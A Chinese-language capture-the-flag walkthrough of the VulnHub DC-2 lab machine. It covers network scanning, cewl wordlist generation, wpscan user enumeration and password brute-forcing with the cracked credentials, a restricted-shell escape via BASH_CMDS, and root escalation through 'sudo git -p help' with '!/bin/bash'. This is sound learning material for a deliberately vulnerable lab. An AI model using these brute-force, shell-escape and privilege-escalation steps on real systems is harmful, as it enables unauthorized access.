靶机地址:https://www.vulnhub.com/entry/dc-2,311/
导入到VMware里面去, 设置NAT模式

namp扫描一下c段获取ip地址, 然后再扫描ip地址获取详细的信息

得到ip 192.168.75.134 无法访问
按照下面这个方法可以访问了

在kali上的处理

flag1

网站上就存在
提示了一个cewl工具, 这个工具通过扫描网站生成一个字典

cewl http://dc-2/ -w 1.txt

用dirsearch 扫描一下网站
存在wordpress后台登录页面 http://dc-2/wp-admin

kali自带的工具wpscan用于wordpress框架漏洞
枚举一下用户
wpscan --url http://dc-2/ -e u

找到了3个用户, 结合前面cewl生成的字典,爆破一下密码

wpscan --url http://dc-2/ -U admin -P 1.txt
wpscan --url http://dc-2/ -U jerry -P 1.txt
wpscan --url http://dc-2/ -U tom -P 1.txt
找到两个用户的密码

jerry / adipiscing
tom / parturient

可以登录进后台

flag2

找到第二个flag

flag3

ssh远程登录一下
tom的用户可以登录进去

可以看到flag3
less命令可以查看

这里不能使用cat命令的限制也可以绕过,
看了一下别人的做法
BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/

提示我们需要 su 切换用户
su jerry

flag4

find命令可以找到flag4

还有最后一个flag, 肯定是需要提权的
提示了一个 git
通过git提权
sudo git -p help
文件的最后加上 !/bin/bash
这里有个小坑, 终端需要小一点, 才不会一页全部显示出来, 才能在最后输入上!/bin/bash, 要是终端太大了, 会直接结束, 没办法输入

final-flag

参考文章:
https://blog.csdn.net/a310034188/article/details/121624538
https://www.cnblogs.com/zhijiya/p/15142059.html